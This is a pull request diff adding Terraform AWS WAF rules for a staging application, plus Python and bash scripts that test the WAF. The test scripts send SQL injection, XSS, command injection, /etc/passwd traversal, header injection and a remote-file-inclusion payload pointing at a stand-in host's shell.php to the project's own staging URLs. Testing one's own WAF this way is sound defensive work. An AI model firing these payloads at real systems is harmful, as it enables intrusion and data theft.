### PR TITLE
Added Terraform Configuration for AWS WAF

### DIFF
--- a/.github/workflows/destroy-nginx-app.yml
+++ b/.github/workflows/destroy-nginx-app.yml
@@ -1,6 +1,6 @@
 # This is a basic workflow to provision our QA environment using Terraform in CI/CD
 
-name: Destroy All Deployed Infra with Terraform
+name: Destroy Staging Infra with Terraform
 
 # Controls when the workflow will run
 on: 
@@ -28,7 +28,7 @@ defaults:
 jobs: 
     # Destroy the infrastructure
     tfdestroy:
-      name: Destroy Infrastructuree
+      name: Destroy Infrastructure
       runs-on: ubuntu-latest
       environment: 
         name: aws-mgmt

--- a/.github/workflows/staging-nginx-app.yml
+++ b/.github/workflows/staging-nginx-app.yml
@@ -1,6 +1,6 @@
 # This is a basic workflow to provision our QA environment using Terraform in CI/CD
 
-name: Staging Infra Provisioning with Terraform
+name: Provision Staging Infra with Terraform
 
 # Controls when the workflow will run
 on:

--- a/staging/us-east-2/vpc.tf
+++ b/staging/us-east-2/vpc.tf
@@ -1,6 +1,6 @@
 module "staging" {
   # this module now uses the published module in "ifeoma-tf-modules" repo
-  source = "github.com/fojiglobal/ifeoma-tf-modules//staging?ref=v1.0.0"
+  source = "github.com/fojiglobal/ifeoma-tf-modules//staging?ref=v1.1.0"
 
   # these are the variable names in variables.tf "/modules" folder
   vpc_cidr        = local.vpc_cidr_block

--- a/staging/us-east-2/waf-test.py
+++ b/staging/us-east-2/waf-test.py
@@ -1,0 +1,49 @@
+import requests
+
+def test_sql_injection(target_url):
+    print("[+] Testing SQL Injection...")
+    payload = {"user": "admin' OR '1'='1"}
+    response = requests.get(target_url, params=payload)
+    print(response.text)
+
+def test_xss(target_url):
+    print("[+] Testing Cross-Site Scripting (XSS)...")
+    payload = {"input": "<script>alert('XSS')</script>"}
+    response = requests.post(target_url, data=payload)
+    print(response.text)
+
+def test_command_injection(target_url):
+    print("[+] Testing Command Injection...")
+    payload = {"cmd": "; ls -la"}
+    response = requests.post(target_url, data=payload)
+    print(response.text)
+
+def test_local_file_inclusion(target_url):
+    print("[+] Testing Local File Inclusion (LFI)...")
+    payload = {"file": "../../../../etc/passwd"}
+    response = requests.get(target_url, params=payload)
+    print(response.text)
+
+def test_remote_file_inclusion(target_url):
+    print("[+] Testing Remote File Inclusion (RFI)...")
+    payload = {"file": "http://malicious.com/shell.php"}
+    response = requests.get(target_url, params=payload)
+    print(response.text)
+
+def test_header_injection(target_url):
+    print("[+] Testing HTTP Header Injection...")
+    headers = {"User-Agent": "<script>alert('Header Injection')</script>"}
+    response = requests.get(target_url, headers=headers)
+    print(response.text)
+
+if __name__ == "__main__":
+    TARGET_URL = "https://stage.fojiapps.com/"  # Replace with your WAF-protected endpoint
+
+    test_sql_injection(TARGET_URL)
+    test_xss(TARGET_URL)
+    test_command_injection(TARGET_URL)
+    test_local_file_inclusion(TARGET_URL)
+    test_remote_file_inclusion(TARGET_URL)
+    test_header_injection(TARGET_URL)
+
+    print("[+] All tests executed. Review WAF logs for details.")

--- a/staging/us-east-2/waf-test.sh
+++ b/staging/us-east-2/waf-test.sh
@@ -1,0 +1,56 @@
+#!/bin/bash
+
+# Set the target URL for testing
+TARGET_URL="https://stg.cloudwithify.online/"  # Replace with your WAF-protected endpoint
+
+# Function to send SQL Injection payload
+function test_sql_injection() {
+  echo "[+] Testing SQL Injection..."
+  curl -X GET "$TARGET_URL?user=admin' OR '1'='1" -H "Content-Type: application/x-www-form-urlencoded"
+}
+
+# Function to send Cross-Site Scripting (XSS) payload
+function test_xss() {
+  echo "[+] Testing Cross-Site Scripting (XSS)..."
+  curl -X POST "$TARGET_URL" \
+    -H "Content-Type: application/x-www-form-urlencoded" \
+    -d "input=<script>alert('XSS')</script>"
+}
+
+# Function to send Command Injection payload
+function test_command_injection() {
+  echo "[+] Testing Command Injection..."
+  curl -X POST "$TARGET_URL" \
+    -H "Content-Type: application/x-www-form-urlencoded" \
+    -d "cmd=; ls -la"
+}
+
+# Function to send Local File Inclusion payload
+function test_local_file_inclusion() {
+  echo "[+] Testing Local File Inclusion (LFI)..."
+  curl -X GET "$TARGET_URL?file=../../../../etc/passwd" -H "Content-Type: application/x-www-form-urlencoded"
+}
+
+# Function to send Remote File Inclusion payload
+function test_remote_file_inclusion() {
+  echo "[+] Testing Remote File Inclusion (RFI)..."
+  curl -X GET "$TARGET_URL?file=http://malicious.com/shell.php" -H "Content-Type: application/x-www-form-urlencoded"
+}
+
+# Function to send HTTP Header Injection payload
+function test_header_injection() {
+  echo "[+] Testing HTTP Header Injection..."
+  curl -X GET "$TARGET_URL" \
+    -H "User-Agent: \"<script>alert('Header Injection')</script>\""
+}
+
+# Execute tests
+
+test_sql_injection
+test_xss
+test_command_injection
+test_local_file_inclusion
+test_remote_file_inclusion
+test_header_injection
+
+echo "[+] All tests executed. Review WAF logs for details."

--- a/staging/us-east-2/waf.tf
+++ b/staging/us-east-2/waf.tf
@@ -112,7 +112,7 @@ resource "aws_wafv2_web_acl" "staging_waf" {
 
   # POSIX operating system AWS Managed rule group
   rule {
-    name     = "AWSManagedRulesPOSIXRuleSet"
+    name     = "AWSManagedRulesUnixRuleSet"
     priority = 60
     override_action {
       count {}

--- a/staging/us-east-2/waf.tf
+++ b/staging/us-east-2/waf.tf
@@ -1,0 +1,185 @@
+#### Web ACL to protect our app in the staging environment
+
+resource "aws_wafv2_web_acl" "staging_waf" {
+  name        = "${local.env}-waf"
+  description = "Using Web ACLs for our ALB using AWS Managed Rules"
+  scope       = "REGIONAL"
+
+  # Default web ACL action for requests that don't match any rules
+  default_action {
+    allow {}
+  }
+
+  # Admin protection AWS Managed rule group
+  rule {
+    name     = "AWSManagedRulesAdminProtectionRuleSet"
+    priority = 10
+    override_action {
+      count {}
+    }
+    statement {
+      managed_rule_group_statement {
+        name        = "AWSManagedRulesAdminProtectionRuleSet"
+        vendor_name = "AWS"
+      }
+    }
+    visibility_config {
+      sampled_requests_enabled   = true
+      cloudwatch_metrics_enabled = true
+      metric_name                = "admin-protection-ruleset-metric"
+    }
+  }
+
+  # Core rule set AWS Managed rule group
+  rule {
+    name     = "AWSManagedRulesCommonRuleSet"
+    priority = 20
+    override_action {
+      count {}
+    }
+    statement {
+      managed_rule_group_statement {
+        name        = "AWSManagedRulesCommonRuleSet"
+        vendor_name = "AWS"
+      }
+    }
+    visibility_config {
+      sampled_requests_enabled   = true
+      cloudwatch_metrics_enabled = true
+      metric_name                = "common-ruleset-metric"
+    }
+  }
+
+  # Known bad inputs AWS Managed rule group
+  rule {
+    name     = "AWSManagedRulesKnownBadInputsRuleSet"
+    priority = 30
+    override_action {
+      count {}
+    }
+    statement {
+      managed_rule_group_statement {
+        name        = "AWSManagedRulesKnownBadInputsRuleSet"
+        vendor_name = "AWS"
+      }
+    }
+    visibility_config {
+      sampled_requests_enabled   = true
+      cloudwatch_metrics_enabled = true
+      metric_name                = "known-bad-inputs-ruleset-metric"
+    }
+  }
+
+  # Linux operating system AWS Managed rule group
+  rule {
+    name     = "AWSManagedRulesLinuxRuleSet"
+    priority = 40
+    override_action {
+      count {}
+    }
+    statement {
+      managed_rule_group_statement {
+        name        = "AWSManagedRulesLinuxRuleSet"
+        vendor_name = "AWS"
+      }
+    }
+    visibility_config {
+      sampled_requests_enabled   = true
+      cloudwatch_metrics_enabled = true
+      metric_name                = "linux-ruleset-metric"
+    }
+  }
+
+  # PHP application AWS Managed rule group
+  rule {
+    name     = "AWSManagedRulesPHPRuleSet"
+    priority = 50
+    override_action {
+      count {}
+    }
+    statement {
+      managed_rule_group_statement {
+        name        = "AWSManagedRulesPHPRuleSet"
+        vendor_name = "AWS"
+      }
+    }
+    visibility_config {
+      sampled_requests_enabled   = true
+      cloudwatch_metrics_enabled = true
+      metric_name                = "php-ruleset-metric"
+    }
+  }
+
+  # POSIX operating system AWS Managed rule group
+  rule {
+    name     = "AWSManagedRulesPOSIXRuleSet"
+    priority = 60
+    override_action {
+      count {}
+    }
+    statement {
+      managed_rule_group_statement {
+        name        = "AWSManagedRulesUnixRuleSet"
+        vendor_name = "AWS"
+      }
+    }
+    visibility_config {
+      sampled_requests_enabled   = true
+      cloudwatch_metrics_enabled = true
+      metric_name                = "posix-ruleset-metric"
+    }
+  }
+
+  # SQL database AWS Managed rule group
+  rule {
+    name     = "AWSManagedRulesSQLiRuleSet"
+    priority = 70
+    override_action {
+      count {}
+    }
+    statement {
+      managed_rule_group_statement {
+        name        = "AWSManagedRulesSQLiRuleSet"
+        vendor_name = "AWS"
+      }
+    }
+    visibility_config {
+      sampled_requests_enabled   = true
+      cloudwatch_metrics_enabled = true
+      metric_name                = "sql-injection-ruleset-metric"
+    }
+  }
+
+  # WordPress application AWS Managed rule group
+  rule {
+    name     = "AWSManagedRulesWordPressRuleSet"
+    priority = 80
+    override_action {
+      count {}
+    }
+    statement {
+      managed_rule_group_statement {
+        name        = "AWSManagedRulesWordPressRuleSet"
+        vendor_name = "AWS"
+      }
+    }
+    visibility_config {
+      sampled_requests_enabled   = true
+      cloudwatch_metrics_enabled = true
+      metric_name                = "wordpress-ruleset-metric"
+    }
+  }
+
+  visibility_config {
+    cloudwatch_metrics_enabled = true
+    metric_name                = "${local.env}-waf-metric"
+    sampled_requests_enabled   = true
+  }
+}
+
+# WAF association with ALB
+
+resource "aws_wafv2_web_acl_association" "staging_waf_alb_association" {
+  resource_arn = module.staging.alb_arn
+  web_acl_arn  = aws_wafv2_web_acl.staging_waf.arn
+}

--- a/staging/us-east-2/waf.tf
+++ b/staging/us-east-2/waf.tf
@@ -112,7 +112,7 @@ resource "aws_wafv2_web_acl" "staging_waf" {
 
   # POSIX operating system AWS Managed rule group
   rule {
-    name     = "AWSManagedRulesUnixRuleSet"
+    name     = "AWSManagedRulesPOSIXRuleSet"
     priority = 60
     override_action {
       count {}


### PR DESCRIPTION
This PR performs the following tasks:

- Added test scripts for WAF (`python` & `bash` scripts)
- Added AWS WAF configurations using Terraform
- Modified our module to use the latest tag since it was updated to add our ALB ARN as output 